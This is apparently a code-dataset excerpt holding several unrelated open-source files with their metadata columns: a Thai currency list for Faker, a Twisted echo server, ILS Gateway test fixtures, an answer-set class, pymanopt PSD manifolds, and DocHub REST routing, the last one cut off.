repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
joke2k/faker | faker/providers/currency/th_TH/__init__.py | 1 | 10596 | from .. import Provider as CurrencyProvider
# Names taken from https://std.moc.go.th/std/codelist_detail/40
class Provider(CurrencyProvider):
# Format: (code, name)
currencies = (
("AED", "ดีแรห์ม สหรัฐอาหรับเอมิเรตส์"),
("AFN", "อัฟกานิ"),
("ALL", "เลค"),
("AMD", "ดีแรห์ม อาร์เมเนีย"),
("ANG", "กิลเดอร์ เนเธอร์แลนด์แอนทิลลิส"),
("AOA", "ควันซา"),
("ARS", "เปโซ อาร์เจนตินา"),
("AUD", "ดอลลาร์ ออสเตรเลีย"),
("AWG", "กิลเดอร์ อารูบา"),
("AZN", "มานาท อาเซอร์ไบจาน"),
("BAM", "มาร์ค บอสเนียและเฮอร์เซโกวีนา"),
("BBD", "ดอลลาร์ บาร์เบโดส"),
("BDT", "ตากา"),
("BGN", "เลฟ บัลแกเรีย"),
("BHD", "ดีนาร์ บาห์เรน"),
("BIF", "ฟรังก์ บุรุนดี"),
("BMD", "ดอลลาร์ เบอร์มิวดา"),
("BND", "ดอลลาร์ บรูไนดารุสซาลาม"),
("BOB", "โบลีเวียโน"),
("BRL", "เรียล บราซิล"),
("BSD", "ดอลลาร์ บาฮามาส"),
("BTN", "เองกัลทรัม"),
("BWP", "พูลา"),
("BYR", "รูเบิล เบลารุส"),
("BZD", "ดอลลาร์ เบลีซ"),
("CAD", "ดอลลาร์ แคนาดา"),
("CDF", "ฟรังก์ คองโก"),
("CHF", "ฟรังก์ สวิส"),
("CLF", "ฟันด์ โค้ด ยูนิแดด ดี โฟเมนโต"),
("CLP", "เปโซ ชิลี"),
("CNY", "หยวนเหรินหมินปี้"),
("COP", "เปโซ โคลอมเบีย"),
("COU", "ยูนิแดด ดี วาโล เรียล"),
("CRC", "โคโลน คอสตาริกา"),
("CUC", "แปลงสภาพเปโซ"),
("CUP", "เปโซ คิวบา"),
("CVE", "เอสคูโด เคปเวิร์ด"),
("CZK", "คราวน์ เช็ก"),
("DJF", "ฟรังก์ จิบูตี"),
("DKK", "โครน เดนมาร์ก"),
("DOP", "เปโซ สาธารณรัฐโดมินิกัน"),
("DZD", "ดีนาร์ แอลจีเรีย"),
("EGP", "ปอนด์ อียิปต์"),
("ERN", "นาคฟา"),
("ETB", "เปอร์ เอธิโอเปีย"),
("EUR", "ยูโร"),
("FJD", "ดอลลาร์ ฟิจิ"),
("FKP", "ปอนด์ หมู่เกาะฟอล์กแลนด์"),
("GBP", "ปอนด์สเตอลิง"),
("GEL", "ลารี"),
("GHS", "เซดี กานา"),
("GIP", "ปอนด์ ยิบรอลตาร์"),
("GMD", "ดาราซี"),
("GNF", "ฟรังก์ กินี"),
("GTQ", "เก็ตซาล"),
("GYD", "ดอลลาร์ กายอานา"),
("HKD", "ดอลลาร์ ฮ่องกง"),
("HNL", "เลมพีรา ฮอนดูรัส"),
("HRK", "คูนา"),
("HTG", "กอร์ด"),
("HUF", "ฟอรินท์"),
("IDR", "รูเปีย"),
("ILS", "เชคเกิล อิสราเอล"),
("INR", "รูปี อินเดีย"),
("IQD", "ดีนาร์ อิรัก"),
("IRR", "เรียล อิหร่าน"),
("ISK", "โครนา ไอซ์แลนด์"),
("JMD", "ดอลลาร์ จาเมกา"),
("JOD", "ดอลลาร์ จอร์แดน"),
("JPY", "เยน"),
("KES", "ชิลลิง เคนยา"),
("KGS", "ซอม"),
("KHR", "เรียล กัมพูชา"),
("KMF", "ฟรังก์ คอโมโรส"),
("KPW", "วอน เกาหลีเหนือ"),
("KRW", "วอน เกาหลีใต้"),
("KWD", "ดีนาร์ คูเวต"),
("KYD", "ดอลลาร์ หมู่เกาะเคย์แมน"),
("KZT", "เทงเก"),
("LAK", "กีบ"),
("LBP", "ปอนด์ เลบานอน"),
("LKR", "รูปี ศรีลังกา"),
("LRD", "ดอลลาร์ ไลบีเรีย"),
("LSL", "โลตี"),
("LTL", "ลีทาส ลิทัวเนีย"),
("LVL", "ลัตส์ ลัตเวีย"),
("LYD", "ดีนาร์ ลิเบีย"),
("MAD", "ดีแรห์ม โมร็อกโก"),
("MDL", "ลิว มอลโดวา"),
("MGA", "อเรียรี่ มาดากัสการ์"),
("MKD", "ดีนาร์ มาซิโดเนีย"),
("MMK", "จัต"),
("MNT", "ทูกริค"),
("MOP", "พาทากา"),
("MRO", "อูกุยยา / อูกียา"),
("MUR", "รูปี มอริเชียส"),
("MVR", "รูฟียา"),
("MWK", "ควาซา มาลาวี"),
("MXN", "เปโซ เม็กซิโก"),
("MYR", "ริงกิต มาเลเซีย"),
("MZN", "เมททิคัล โมซัมบิก"),
("NAD", "ดอลลาร์ นามิเบีย"),
("NGN", "ไนรา"),
("NIO", "คอร์โดบา"),
("NOK", "โครน นอร์เวย์"),
("NPR", "รูปี เนปาล"),
("NZD", "ดอลลาร์ นิวซีแลนด์"),
("OMR", "เรียล โอมาน"),
("PAB", "บัลโบอา"),
("PEN", "ซัล เปรู"),
("PGK", "คีนา"),
("PHP", "เปโซ ฟิลิปปินส์"),
("PKR", "รูปี ปากีสถาน"),
("PLN", "สล็อตตี"),
("PYG", "กวารานี"),
("QAR", "เรียล กาตาร์"),
("RON", "ลิว โรมาเนีย"),
("RSD", "ดีนาร์ เซอร์เบีย"),
("RUB", "รูเบิล รัสเซีย"),
("RWF", "ฟรังก์ รวันดา"),
("SAR", "ริยัล ซาอุดีอาระเบีย"),
("SBD", "ดอลลาร์ หมู่เกาะโซโลมอน"),
("SCR", "รูปี เซเชลส์"),
("SDG", "ปอนด์ ซูดาน"),
("SEK", "โครนา สวีเดน"),
("SGD", "ดอลลาร์ สิงคโปร์"),
("SHP", "ปอนด์ เซนต์เฮเลนา"),
("SLL", "ลีโอน"),
("SOS", "ชิลลิง โซมาเลีย"),
("SRD", "ดอลลาร์ ซูรินาเม"),
("SSP", "ปอนด์ เซาท์ซูดาน"),
("STD", "โดบรา"),
("SVC", "โคโลน เอลซัลวาดอร์"),
("SYP", "ปอนด์ ซีเรีย"),
("SZL", "ลิลอนเกนี"),
("THB", "บาท"),
("TJS", "โซโมนิ"),
("TMT", "มานาท เติร์กเมนิสถานใหม่"),
("TND", "ดีนาร์ ตูนิเซีย"),
("TOP", "พาอานกา"),
("TRY", "ลีร์ ตุรกี"),
("TTD", "ดอลลาร์ ตรินิแดดและโตเบโก"),
("TWD", "ดอลลาร์ ไต้หวัน"),
("TZS", "ชิลลิง แทนซาเนีย"),
("UAH", "รีฟเนีย"),
("UGX", "ชิลลิง ยูกันดา"),
("USD", "ดอลลาร์ สหรัฐอเมริกา"),
("USN", "ดอลลาร์ สหรัฐอเมริกา เน็กซ์เดย์ฟัน"),
("UYI", "อุรุกวัย เปโซ เอ็น อุนดิดาเดซ อินเด็กซาดาซ"),
("UYU", "เปโซ อุรุกวัย"),
("UZS", "โซม อุซเบกิสถาน"),
("VEF", "โบลิวาร์"),
("VND", "ดอง"),
("VUV", "วาตู"),
("WST", "ทาลา"),
("XAF", "ฟรังก์ ซีเอฟเอ บีอีเอซี"),
("XAG", "เงิน"),
("XAU", "ทองคำ"),
("XBA", "อียูอาร์ซีโอ"),
("XBB", "อีเอ็มยู 6"),
("XBC", "บัญชี อียู 9"),
("XBD", "บัญชี อียู 17"),
("XCD", "ดอลลาร์ คาริบเบียลตะวันออก"),
("XDR", "สิทธิพิเศษถอนเงิน (กองทุนการเงินระหว่างประเทศ)"),
("XEU", "อี ซี ยู"),
("XFU", "ยูไอซี ฟรังก์"),
("XOF", "ฟรังก์ ซีเอฟเอ บีซีอีเอโอ"),
("XPD", "พัลเลเดียม"),
("XPF", "ฟรังก์ ซีเอฟพี"),
("XPT", "แพลตตินัม"),
("XSU", "ซูเคร"),
("XUA", "เอดีบี"),
("XXX", "ธุรกรรมที่ไม่มีเงินสกุลใดเกี่ยวข้อง"),
("YER", "เรียล เยเมน"),
("ZAR", "แรนด์"),
("ZMW", "ควาซา แซมเบีย"),
("ZWL", "ดอลลาร์ ซิมบับเว"),
)
| mit | 2,836,218,077,930,482,700 | 32.537634 | 66 | 0.38538 | false |
obedmr/MPIaaS | app/echoserv.py | 1 | 1498 | #!/usr/bin/env python
from twisted.internet.protocol import Protocol, Factory
from twisted.internet import reactor
import twisted.internet.error
import sys
import ConfigParser
CONFIG_CONF = "setup.conf"
PORT=8000
class Echo(Protocol):
def dataReceived(self, data):
"""
As soon as any data is received, write it back.
"""
lines = data.split('\n')
for line in lines:
if "PORT:" in line:
print line
port = line.split(":")[1].strip()
if "SERVER_IP:" in line:
print line
server_ip = line.split(":")[1].strip()
if "LOCAL_IP:" in line:
print line
client_ip = line.split(":")[1].strip()
parser = ConfigParser.SafeConfigParser()
section = 'CLIENTS_' + client_ip
parser.add_section(section)
parser.set(section, 'ip',str(client_ip))
parser.set(section, 'port',str(port))
parser.write(sys.stdout)
file_conf = open(CONFIG_CONF,'a')
parser.write(file_conf)
file_conf.close()
self.transport.write(data)
def main():
try:
f = Factory()
f.protocol = Echo
reactor.listenTCP(PORT, f)
reactor.run()
except twisted.internet.error.CannotListenError, ex:
print "Port is %d busy: %s" % (PORT, ex)
print "Run ./mpiaas_runner.py --killserver"
sys.exit(1)
if __name__ == '__main__':
main()
| apache-2.0 | -7,503,330,617,456,163,000 | 25.280702 | 56 | 0.55474 | false |
qedsoftware/commcare-hq | custom/ilsgateway/tests/handlers/utils.py | 1 | 8375 | from corehq.apps.accounting.models import BillingAccount, DefaultProductPlan, SoftwarePlanEdition, Subscription
from corehq.apps.accounting.tests import generator
from corehq.apps.commtrack.models import CommtrackActionConfig
from corehq.apps.custom_data_fields import CustomDataFieldsDefinition
from corehq.apps.custom_data_fields.models import CustomDataField
from corehq.apps.domain.models import Domain
from corehq.apps.locations.models import Location, SQLLocation, LocationType
from corehq.apps.products.models import Product, SQLProduct
from corehq.apps.sms.tests.util import setup_default_sms_test_backend, delete_domain_phone_numbers
from corehq.apps.users.models import CommCareUser
from custom.ilsgateway.models import ILSGatewayConfig
from custom.ilsgateway.utils import make_loc
from custom.logistics.tests.test_script import TestScript
from custom.logistics.tests.utils import bootstrap_user
from casexml.apps.stock.models import DocDomainMapping
TEST_DOMAIN = 'ils-test-domain'
def create_products(cls, domain_name, codes):
for code in codes:
product = Product(domain=domain_name, name=code, code=code, unit='each')
product.save()
setattr(cls, code, product)
class ILSTestScript(TestScript):
@classmethod
def bypass_setUpClass(cls):
super(ILSTestScript, cls).setUpClass()
@classmethod
def setUpClass(cls):
super(ILSTestScript, cls).setUpClass()
cls.sms_backend, cls.sms_backend_mapping = setup_default_sms_test_backend()
domain = prepare_domain(TEST_DOMAIN)
mohsw = make_loc(code="moh1", name="Test MOHSW 1", type="MOHSW", domain=domain.name)
msdzone = make_loc(code="msd1", name="MSD Zone 1", type="MSDZONE",
domain=domain.name, parent=mohsw)
region = make_loc(code="reg1", name="Test Region 1", type="REGION",
domain=domain.name, parent=msdzone)
cls.district = make_loc(code="dis1", name="Test District 1", type="DISTRICT",
domain=domain.name, parent=region)
cls.district2 = make_loc(code="d10101", name="Test District 2", type="DISTRICT",
domain=domain.name, parent=region)
cls.district3 = make_loc(code="d10102", name="TESTDISTRICT", type="DISTRICT",
domain=domain.name, parent=region)
cls.facility = make_loc(code="loc1", name="Test Facility 1", type="FACILITY",
domain=domain.name, parent=cls.district, metadata={'group': 'A'})
cls.facility_sp_id = cls.facility.sql_location.supply_point_id
facility2 = make_loc(code="loc2", name="Test Facility 2", type="FACILITY",
domain=domain.name, parent=cls.district, metadata={'group': 'B'})
cls.facility3 = make_loc(
code="d31049", name="Test Facility 3", type="FACILITY", domain=domain.name, parent=cls.district,
metadata={'group': 'C'}
)
cls.user1 = bootstrap_user(
cls.facility, username='stella', domain=domain.name, home_loc='loc1', phone_number='5551234',
first_name='stella', last_name='Test', language='sw'
)
bootstrap_user(facility2, username='bella', domain=domain.name, home_loc='loc2', phone_number='5555678',
first_name='bella', last_name='Test', language='sw')
bootstrap_user(cls.district, username='trella', domain=domain.name, home_loc='dis1', phone_number='555',
first_name='trella', last_name='Test', language='sw')
bootstrap_user(cls.district, username='msd_person', domain=domain.name, phone_number='111',
first_name='MSD', last_name='Person', user_data={'role': 'MSD'}, language='sw')
for x in xrange(1, 4):
bootstrap_user(
cls.facility3,
username='person{}'.format(x), domain=domain.name, phone_number=str(32346 + x),
first_name='Person {}'.format(x), last_name='Person {}'. format(x), home_loc='d31049',
language='sw'
)
bootstrap_user(
cls.district2,
username='dperson{}'.format(x), domain=domain.name, phone_number=str(32349 + x),
first_name='dPerson {}'.format(x), last_name='dPerson {}'. format(x), home_loc='d10101',
language='sw'
)
create_products(cls, domain.name, ["id", "dp", "fs", "md", "ff", "dx", "bp", "pc", "qi", "jd", "mc", "ip"])
def setUp(self):
super(ILSTestScript, self).setUp()
self.domain = Domain.get_by_name(TEST_DOMAIN)
self.loc1 = Location.by_site_code(TEST_DOMAIN, 'loc1')
self.loc2 = Location.by_site_code(TEST_DOMAIN, 'loc2')
self.dis = Location.by_site_code(TEST_DOMAIN, 'dis1')
self.user_fac1 = CommCareUser.get_by_username('stella')
self.user_fac2 = CommCareUser.get_by_username('bella')
self.user_dis = CommCareUser.get_by_username('trella')
self.msd_user = CommCareUser.get_by_username('msd_person')
@classmethod
def tearDownClass(cls):
delete_domain_phone_numbers(TEST_DOMAIN)
if cls.sms_backend_mapping.id is not None:
cls.sms_backend_mapping.delete()
if cls.sms_backend.id is not None:
cls.sms_backend.delete()
for username in [
'stella',
'bella',
'trella',
'msd_person',
]:
user = CommCareUser.get_by_username(username)
if user:
user.delete()
for product in Product.by_domain(TEST_DOMAIN):
product.delete()
SQLProduct.objects.all().delete()
ils_gateway_config = ILSGatewayConfig.for_domain(TEST_DOMAIN)
if ils_gateway_config:
ils_gateway_config.delete()
DocDomainMapping.objects.all().delete()
for site_code in [
'loc1',
'loc2',
'dis1',
'reg1',
'moh1',
]:
location = Location.by_site_code(TEST_DOMAIN, site_code)
if location:
location.delete()
SQLLocation.objects.all().delete()
generator.delete_all_subscriptions()
test_domain = Domain.get_by_name(TEST_DOMAIN)
if test_domain:
test_domain.delete()
super(ILSTestScript, cls).tearDownClass()
def prepare_domain(domain_name):
from corehq.apps.commtrack.tests.util import bootstrap_domain
domain = bootstrap_domain(domain_name)
previous = None
for name, administrative in [
("MOHSW", True),
("MSDZONE", True),
("REGION", True),
("DISTRICT", True),
("FACILITY", False)
]:
previous, _ = LocationType.objects.get_or_create(
domain=domain_name,
name=name,
parent_type=previous,
administrative=administrative,
)
generator.instantiate_accounting()
account = BillingAccount.get_or_create_account_by_domain(
domain.name,
created_by="automated-test",
)[0]
plan = DefaultProductPlan.get_default_plan_version(
edition=SoftwarePlanEdition.ADVANCED
)
commtrack = domain.commtrack_settings
commtrack.actions.append(
CommtrackActionConfig(action='receipts',
keyword='delivered',
caption='Delivered')
)
commtrack.save()
subscription = Subscription.new_domain_subscription(
account,
domain.name,
plan
)
subscription.is_active = True
subscription.save()
ils_config = ILSGatewayConfig(enabled=True, domain=domain.name, all_stock_data=True)
ils_config.save()
fields_definition = CustomDataFieldsDefinition.get_or_create(domain.name, 'LocationFields')
fields_definition.fields.append(CustomDataField(
slug='group',
label='Group',
is_required=False,
choices=['A', 'B', 'C'],
is_multiple_choice=False
))
fields_definition.save()
return domain
def add_products(sql_location, products_codes_list):
sql_location.products = [
SQLProduct.objects.get(domain=sql_location.domain, code=code)
for code in products_codes_list
]
sql_location.save()
| bsd-3-clause | 273,365,825,518,556,500 | 41.085427 | 115 | 0.615522 | false |
SimoneLucia/EmbASP-Python | languages/asp/answer_set.py | 1 | 1221 | from languages.asp.asp_mapper import ASPMapper
class AnserSet(object):
"""A collection of data representing a generic Answer Set"""
def __init__(self, value, weightMap=dict()):
self.__value = value # Where data of answer set is stored
self.__weight_map = weightMap # Where weights of the answer set are stored
self.__atoms = set() # Where Answer set's atoms are stored
def get_answer_set(self):
"""Return the current __value data
The method return a list of answer sets in a String format
"""
return self.__value
def get_atoms(self):
"""Return atoms stored in __atoms
The method return a set of Object filled with atoms data
"""
if not self.__atoms:
mapper = ASPMapper.get_instance()
for atom in self.__value:
obj = mapper.get_object(atom)
if (not obj == None):
self.__atoms.add(obj)
return self.__atoms
def get_weights(self):
"""Return the weight_map"""
return self.__weight_map
def __str__(self):
"""Overload string method"""
return str(self.__value)
| mit | -8,103,394,283,243,837,000 | 31.131579 | 83 | 0.564292 | false |
nkoep/pymanopt | pymanopt/manifolds/psd.py | 1 | 15204 | import warnings
import numpy as np
from numpy import linalg as la, random as rnd
from scipy.linalg import expm
# Workaround for SciPy bug: https://github.com/scipy/scipy/pull/8082
try:
from scipy.linalg import solve_continuous_lyapunov as lyap
except ImportError:
from scipy.linalg import solve_lyapunov as lyap
from pymanopt.manifolds.manifold import EuclideanEmbeddedSubmanifold, Manifold
from pymanopt.tools.multi import multilog, multiprod, multisym, multitransp
class _RetrAsExpMixin:
"""Mixin class which defers calls to the exponential map to the retraction
and issues a warning.
"""
def exp(self, Y, U):
warnings.warn(
"Exponential map for manifold '{:s}' not implemented yet. Using "
"retraction instead.".format(self._get_class_name()),
RuntimeWarning)
return self.retr(Y, U)
class SymmetricPositiveDefinite(EuclideanEmbeddedSubmanifold):
"""Manifold of (n x n)^k symmetric positive definite matrices, based on the
geometry discussed in Chapter 6 of Positive Definite Matrices (Bhatia
2007). Some of the implementation is based on sympositivedefinitefactory.m
from the Manopt MATLAB package. Also see "Conic geometric optimisation on
the manifold of positive definite matrices" (Sra & Hosseini 2013) for more
details.
"""
def __init__(self, n, k=1):
self._n = n
self._k = k
if k == 1:
name = ("Manifold of positive definite ({} x {}) matrices").format(
n, n)
else:
name = "Product manifold of {} ({} x {}) matrices".format(k, n, n)
dimension = int(k * n * (n + 1) / 2)
super().__init__(name, dimension)
@property
def typicaldist(self):
return np.sqrt(self.dim)
def dist(self, x, y):
# Adapted from equation 6.13 of "Positive definite matrices". The
# Cholesky decomposition gives the same result as matrix sqrt. There
# may be more efficient ways to compute this.
c = la.cholesky(x)
c_inv = la.inv(c)
logm = multilog(multiprod(multiprod(c_inv, y), multitransp(c_inv)),
pos_def=True)
return la.norm(logm)
def inner(self, x, u, v):
return np.tensordot(la.solve(x, u), la.solve(x, v), axes=x.ndim)
def proj(self, X, G):
return multisym(G)
def egrad2rgrad(self, x, u):
# TODO: Check that this is correct
return multiprod(multiprod(x, multisym(u)), x)
def ehess2rhess(self, x, egrad, ehess, u):
# TODO: Check that this is correct
return (multiprod(multiprod(x, multisym(ehess)), x) +
multisym(multiprod(multiprod(u, multisym(egrad)), x)))
def norm(self, x, u):
# This implementation is as fast as np.linalg.solve_triangular and is
# more stable, as the above solver tends to output non positive
# definite results.
c = la.cholesky(x)
c_inv = la.inv(c)
return la.norm(multiprod(multiprod(c_inv, u), multitransp(c_inv)))
def rand(self):
# The way this is done is arbitrary. I think the space of p.d.
# matrices would have infinite measure w.r.t. the Riemannian metric
# (cf. integral 0-inf [ln(x)] dx = inf) so impossible to have a
# 'uniform' distribution.
# Generate eigenvalues between 1 and 2
d = np.ones((self._k, self._n, 1)) + rnd.rand(self._k, self._n, 1)
# Generate an orthogonal matrix. Annoyingly qr decomp isn't
# vectorized so need to use a for loop. Could be done using
# svd but this is slower for bigger matrices.
u = np.zeros((self._k, self._n, self._n))
for i in range(self._k):
u[i], r = la.qr(rnd.randn(self._n, self._n))
if self._k == 1:
return multiprod(u, d * multitransp(u))[0]
return multiprod(u, d * multitransp(u))
def randvec(self, x):
k = self._k
n = self._n
if k == 1:
u = multisym(rnd.randn(n, n))
else:
u = multisym(rnd.randn(k, n, n))
return u / self.norm(x, u)
def transp(self, x1, x2, d):
return d
def exp(self, x, u):
# TODO: Check which method is faster depending on n, k.
x_inv_u = la.solve(x, u)
if self._k > 1:
e = np.zeros(np.shape(x))
for i in range(self._k):
e[i] = expm(x_inv_u[i])
else:
e = expm(x_inv_u)
return multiprod(x, e)
# This alternative implementation is sometimes faster though less
# stable. It can return a matrix with small negative determinant.
# c = la.cholesky(x)
# c_inv = la.inv(c)
# e = multiexp(multiprod(multiprod(c_inv, u), multitransp(c_inv)),
# sym=True)
# return multiprod(multiprod(c, e), multitransp(c))
retr = exp
def log(self, x, y):
c = la.cholesky(x)
c_inv = la.inv(c)
logm = multilog(multiprod(multiprod(c_inv, y), multitransp(c_inv)),
pos_def=True)
return multiprod(multiprod(c, logm), multitransp(c))
def zerovec(self, x):
k = self._k
n = self._n
if k == 1:
return np.zeros((k, n, n))
return np.zeros((n, n))
# TODO(nkoep): This could either stay in here (seeing how it's a manifold of
# psd matrices, or in fixed_rank. Alternatively, move this one and
# the next class to a dedicated 'psd_fixed_rank' module.
class _PSDFixedRank(Manifold, _RetrAsExpMixin):
def __init__(self, n, k, name, dimension):
self._n = n
self._k = k
super().__init__(name, dimension)
@property
def typicaldist(self):
return 10 + self._k
def inner(self, Y, U, V):
# Euclidean metric on the total space.
return float(np.tensordot(U, V))
def norm(self, Y, U):
return la.norm(U, "fro")
def dist(self, U, V):
raise NotImplementedError(
"The manifold '{:s}' currently provides no implementation of the "
"'dist' method".format(self._get_class_name()))
def proj(self, Y, H):
# Projection onto the horizontal space
YtY = Y.T.dot(Y)
AS = Y.T.dot(H) - H.T.dot(Y)
Omega = lyap(YtY, AS)
return H - Y.dot(Omega)
def egrad2rgrad(self, Y, egrad):
return egrad
def ehess2rhess(self, Y, egrad, ehess, U):
return self.proj(Y, ehess)
def retr(self, Y, U):
return Y + U
def rand(self):
return rnd.randn(self._n, self._k)
def randvec(self, Y):
H = self.rand()
P = self.proj(Y, H)
return self._normalize(P)
def transp(self, Y, Z, U):
return self.proj(Z, U)
def _normalize(self, Y):
return Y / self.norm(None, Y)
def zerovec(self, X):
return np.zeros((self._n, self._k))
class PSDFixedRank(_PSDFixedRank):
"""
Manifold of n-by-n symmetric positive semidefinite matrices of rank k.
A point X on the manifold is parameterized as YY^T where Y is a matrix of
size nxk. As such, X is symmetric, positive semidefinite. We restrict to
full-rank Y's, such that X has rank exactly k. The point X is numerically
represented by Y (this is more efficient than working with X, which may
be big). Tangent vectors are represented as matrices of the same size as
Y, call them Ydot, so that Xdot = Y Ydot' + Ydot Y. The metric is the
canonical Euclidean metric on Y.
Since for any orthogonal Q of size k, it holds that (YQ)(YQ)' = YY',
we "group" all matrices of the form YQ in an equivalence class. The set
of equivalence classes is a Riemannian quotient manifold, implemented
here.
Notice that this manifold is not complete: if optimization leads Y to be
rank-deficient, the geometry will break down. Hence, this geometry should
only be used if it is expected that the points of interest will have rank
exactly k. Reduce k if that is not the case.
An alternative, complete, geometry for positive semidefinite matrices of
rank k is described in Bonnabel and Sepulchre 2009, "Riemannian Metric
and Geometric Mean for Positive Semidefinite Matrices of Fixed Rank",
SIAM Journal on Matrix Analysis and Applications.
The geometry implemented here is the simplest case of the 2010 paper:
M. Journee, P.-A. Absil, F. Bach and R. Sepulchre,
"Low-Rank Optimization on the Cone of Positive Semidefinite Matrices".
Paper link: http://www.di.ens.fr/~fbach/journee2010_sdp.pdf
"""
def __init__(self, n, k):
name = ("YY' quotient manifold of {:d}x{:d} psd matrices of "
"rank {:d}".format(n, n, k))
dimension = int(k * n - k * (k - 1) / 2)
super().__init__(n, k, name, dimension)
class PSDFixedRankComplex(_PSDFixedRank):
"""
Manifold of n x n complex Hermitian pos. semidefinite matrices of rank k.
Manifold of n-by-n complex Hermitian positive semidefinite matrices of
fixed rank k. This follows the quotient geometry described
in Sarod Yatawatta's 2013 paper:
"Radio interferometric calibration using a Riemannian manifold", ICASSP.
Paper link: http://dx.doi.org/10.1109/ICASSP.2013.6638382.
A point X on the manifold M is parameterized as YY^*, where Y is a
complex matrix of size nxk of full rank. For any point Y on the manifold M,
given any kxk complex unitary matrix U, we say Y*U is equivalent to Y,
i.e., YY^* does not change. Therefore, M is the set of equivalence
classes and is a Riemannian quotient manifold C^{nk}/U(k)
where C^{nk} is the set of all complex matrix of size nxk of full rank.
The metric is the usual real-trace inner product, that is,
it is the usual metric for the complex plane identified with R^2.
Notice that this manifold is not complete: if optimization leads Y to be
rank-deficient, the geometry will break down. Hence, this geometry should
only be used if it is expected that the points of interest will have rank
exactly k. Reduce k if that is not the case.
"""
def __init__(self, n, k):
name = ("YY' quotient manifold of Hermitian {:d}x{:d} complex "
"matrices of rank {:d}".format(n, n, k))
dimension = 2 * k * n - k * k
super().__init__(n, k, name, dimension)
def inner(self, Y, U, V):
return 2 * float(np.tensordot(U, V).real)
def norm(self, Y, U):
return np.sqrt(self.inner(Y, U, U))
def dist(self, U, V):
S, _, D = la.svd(V.T.conj().dot(U))
E = U - V.dot(S).dot(D)
return self.inner(None, E, E) / 2
def rand(self):
rand_ = super().rand
return rand_() + 1j * rand_()
class Elliptope(Manifold, _RetrAsExpMixin):
"""
Manifold of n-by-n psd matrices of rank k with unit diagonal elements.
A point X on the manifold is parameterized as YY^T where Y is a matrix of
size nxk. As such, X is symmetric, positive semidefinite. We restrict to
full-rank Y's, such that X has rank exactly k. The point X is numerically
represented by Y (this is more efficient than working with X, which may be
big). Tangent vectors are represented as matrices of the same size as Y,
call them Ydot, so that Xdot = Y Ydot' + Ydot Y and diag(Xdot) == 0. The
metric is the canonical Euclidean metric on Y.
The diagonal constraints on X (X(i, i) == 1 for all i) translate to
unit-norm constraints on the rows of Y: norm(Y(i, :)) == 1 for all i. The
set of such Y's forms the oblique manifold. But because for any orthogonal
Q of size k, it holds that (YQ)(YQ)' = YY', we "group" all matrices of the
form YQ in an equivalence class. The set of equivalence classes is a
Riemannian quotient manifold, implemented here.
Note that this geometry formally breaks down at rank-deficient Y's. This
does not appear to be a major issue in practice when optimization
algorithms converge to rank-deficient Y's, but convergence theorems no
longer hold. As an alternative, you may use the oblique manifold (it has
larger dimension, but does not break down at rank drop.)
The geometry is taken from the 2010 paper:
M. Journee, P.-A. Absil, F. Bach and R. Sepulchre,
"Low-Rank Optimization on the Cone of Positive Semidefinite Matrices".
Paper link: http://www.di.ens.fr/~fbach/journee2010_sdp.pdf
"""
def __init__(self, n, k):
self._n = n
self._k = k
name = ("YY' quotient manifold of {:d}x{:d} psd matrices of rank {:d} "
"with diagonal elements being 1".format(n, n, k))
dimension = int(n * (k - 1) - k * (k - 1) / 2)
super().__init__(name, dimension)
@property
def typicaldist(self):
return 10 * self._k
def inner(self, Y, U, V):
return float(np.tensordot(U, V))
def dist(self, U, V):
raise NotImplementedError(
"The manifold '{:s}' currently provides no implementation of the "
"'dist' method".format(self._get_class_name()))
def norm(self, Y, U):
return np.sqrt(self.inner(Y, U, U))
# Projection onto the tangent space, i.e., on the tangent space of
# ||Y[i, :]||_2 = 1
def proj(self, Y, H):
eta = self._project_rows(Y, H)
# Projection onto the horizontal space
YtY = Y.T.dot(Y)
AS = Y.T.dot(eta) - H.T.dot(Y)
Omega = lyap(YtY, -AS)
return eta - Y.dot((Omega - Omega.T) / 2)
def retr(self, Y, U):
return self._normalize_rows(Y + U)
# Euclidean gradient to Riemannian gradient conversion. We only need the
# ambient space projection: the remainder of the projection function is not
# necessary because the Euclidean gradient must already be orthogonal to
# the vertical space.
def egrad2rgrad(self, Y, egrad):
return self._project_rows(Y, egrad)
def ehess2rhess(self, Y, egrad, ehess, U):
scaling_grad = (egrad * Y).sum(axis=1)
hess = ehess - U * scaling_grad[:, np.newaxis]
scaling_hess = (U * egrad + Y * ehess).sum(axis=1)
hess -= Y * scaling_hess[:, np.newaxis]
return self.proj(Y, hess)
def rand(self):
return self._normalize_rows(rnd.randn(self._n, self._k))
def randvec(self, Y):
H = self.proj(Y, self.rand())
return H / self.norm(Y, H)
def transp(self, Y, Z, U):
return self.proj(Z, U)
def _normalize_rows(self, Y):
"""Return an l2-row-normalized copy of the matrix Y."""
return Y / la.norm(Y, axis=1)[:, np.newaxis]
# Orthogonal projection of each row of H to the tangent space at the
# corresponding row of X, seen as a point on a sphere.
def _project_rows(self, Y, H):
# Compute the inner product between each vector H[i, :] with its root
# point Y[i, :], i.e., Y[i, :].T * H[i, :]. Returns a row vector.
inners = (Y * H).sum(axis=1)
return H - Y * inners[:, np.newaxis]
def zerovec(self, X):
return np.zeros((self._n, self._k))
| bsd-3-clause | 3,308,188,274,906,176,000 | 36.173594 | 79 | 0.615496 | false |
UrLab/DocHub | www/rest_urls.py | 1 | 1862 | from rest_framework.routers import APIRootView, DefaultRouter
import catalog.rest
import documents.rest
import notifications.rest
import search.rest
import telepathy.rest
import users.rest
import www.rest
class DochubAPI(APIRootView):
"""
This is the API of DocHub.
You are free to use it to crawl DocHub,
write your own frontend or even make a copy of our documents.
But please, if you do, respect those rules :
* To not hit the server too hard. If you degrade the service for other users, we will ban you.
* Respect the privacy of the users
* If you scrape and reuse our content, plase credit DocHub and the original uploader.
This whole API is auth protected.
To be able to use it without your session cookie,
use your personal token from <a hre="/api/me">/api/me</a>
([doc](http://www.django-rest-framework.org/api-guide/authentication/#tokenauthentication))
"""
pass
class Router(DefaultRouter):
APIRootView = DochubAPI
router = Router()
router.register(r'users', users.rest.UserViewSet)
router.register(r'courses', catalog.rest.CourseViewSet)
router.register(r'categories', catalog.rest.CategoryViewSet)
router.register(r'threads', telepathy.rest.ThreadViewSet)
router.register(r'messages', telepathy.rest.MessageViewSet)
router.register(r'documents', documents.rest.DocumentViewSet)
